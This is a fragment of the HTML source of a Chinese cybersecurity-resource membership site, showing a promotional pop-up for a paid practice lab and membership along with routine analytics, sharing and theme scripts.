                    <div style="padding: 1px;"><div class="modal-colorful-header colorful-bg jb-yellow"><button class="close" data-dismiss="modal"><svg class="ic-close" aria-hidden="true"><use xlink:href="#icon-close"></use></svg></button><div class="colorful-make"></div><div class="text-center"><div class="em2x"><svg class="icon" aria-hidden="true"><use xlink:href="#icon-vip_1"></use></svg></div><div class="mt10 em12 padding-w10">会员低价促销中~</div></div></div><div><body>
<p style="color: orange;">网安全量靶场无境上线，全网最便宜独立环境靶场！</p>
<p style="color: orange;">独家代码审计、凌风云自助获取、ICP信息批量查询等功能已上线</p>
<p style="color: green;">网络安全从拥有一个资源大全开始！</p>
<p style="color: orange;">现在购买仅需99元一年！续费还享八折！</p>
</body>
</div></div>                </div>
                <div class="modal-buts box-body notop text-right"><a type="button" target=_blank class="but radius c-blue" href="http://s.mrw.so/6XqGa">详细介绍</a><a type="button" class="but radius c-green" href="https://vip.bdziyi.com/index.php/user-sign/">注册登陆</a></div>            </div>
        </div>
    </div>
<script type="text/javascript">window.onload = function(){
        setTimeout(function () {$('#modal-system-notice').modal('show');
        $.cookie("showed_system_notice","showed", {path: "/",expires: 1});
    }, 500)};</script>    <script>
        jQuery(document).ready(function ($) {
            function handleAgreementSubmission() {
                var _user_agreement_auths = $('.auth-apply-from [name="user_agreement_auths"]');

                if (_user_agreement_auths.length && !_user_agreement_auths.is(':checked')) {
                    var _user_agreement_auths_box = _user_agreement_auths.closest('.form-check');
                    _user_agreement_auths_box.addClass('ani shake');
                    setTimeout(function () {
                        _user_agreement_auths_box.removeClass('ani shake');
                    }, 400);

                    notyf('请先阅读并同意协议', 'danger');
                    // 禁用按钮1秒后恢复
                    $('.but.c-blue').prop('disabled', true);
                    setTimeout(function() {
                        $('.but.c-blue').prop('disabled', false);
                    }, 1000);
                } else {
                    // 启用按钮（可选，根据需要）
                    $('.but.c-blue').prop('disabled', false);
                }
            }

            $('body').on('click', '.but-average.modal-buts .but.c-blue', function () {
                handleAgreementSubmission();
            });
        });
    </script>
    <script type="text/javascript" src="https://vip.bdziyi.com/wp-content/themes/zibll/js/libs/bootstrap.min.js?ver=8.3" id="bootstrap-js"></script>
<script type="text/javascript" src="https://vip.bdziyi.com/wp-content/themes/zibll/js/loader.js?ver=8.3" id="_loader-js"></script>
<script type="text/javascript" src="https://vip.bdziyi.com/wp-content/themes/zibll/inc/functions/bbs/assets/js/main.min.js?ver=8.3" id="forums-js"></script>
<script type="text/javascript" src="https://vip.bdziyi.com/wp-content/themes/zibll/inc/functions/shop/assets/js/main.min.js?ver=8.3" id="shop-js"></script>
<script type="text/javascript">var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?b1d5fe7471881173b0b5a05d2c916139";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();

var links = document.querySelectorAll('.item-tags a');

for (var i = 0; i < links.length; i++) {
  var randomColor;
  do {
    var r = Math.floor(Math.random() * 128) + 128;
    var g = Math.floor(Math.random() * 128) + 128;
    var b = Math.floor(Math.random() * 128) + 128;
    randomColor = 'rgb(' + r + ',' + g + ',' + b + ')';
  } while ((r * 0.299 + g * 0.587 + b * 0.114) > 200); // 确保亮度不超过200

  links[i].style.backgroundColor = randomColor;
}

//视频
$(document).ready(function() {
    $('#xiayg').on('click', function() {
        var $videoElement = $('.dplayer-video-wrap .dplayer-video.dplayer-video-current');

        if ($videoElement.length) {
            $videoElement.attr('src', 'https://api.86512.cn/api/web.php');
            $videoElement[0].load();
            $videoElement[0].play();
        } else {
            console.error('找不到视频元素');
        }
    });
});
</script>    <!--baidu_push_js-->
    <script type="text/javascript">
        (function() {
            var bp = document.createElement('script');
            var curProtocol = window.location.protocol.split(':')[0];
            if (curProtocol === 'https') {
                bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
            } else {
                bp.src = 'http://push.zhanzhang.baidu.com/push.js';
            }
            var s = document.getElementsByTagName("script")[0];
            s.parentNode.insertBefore(bp, s);
        })();
    </script>
    <!--baidu_push_js-->
    <script type="text/javascript">
        console.log("数据库查询：24次 | 页面生成耗时：938.49ms");
    </script>
<script type="text/javascript">
    window.WeChatShareDate = {
        appId: 'wx8c358971b57c3409',
        timestamp: '1766114162',
        nonceStr: 'EH3OBB6IFtJcyk1x',
        signature: '9dfec7ba950ef41bd735ef375cd79bfec4cef1e2',
        url: 'https://vip.bdziyi.com/2902/',
        title: '',
        img: 'https://oss.bdziyi.com/vip/2024/03/20240324075052980.jpg',
        desc: '',
    }
</script>
        <script type="text/javascript">_win.signin_wx_priority = true;</script>
</body>
</html>
<!-- Performance optimized by Redis Object Cache. Learn more: https://wprediscache.com -->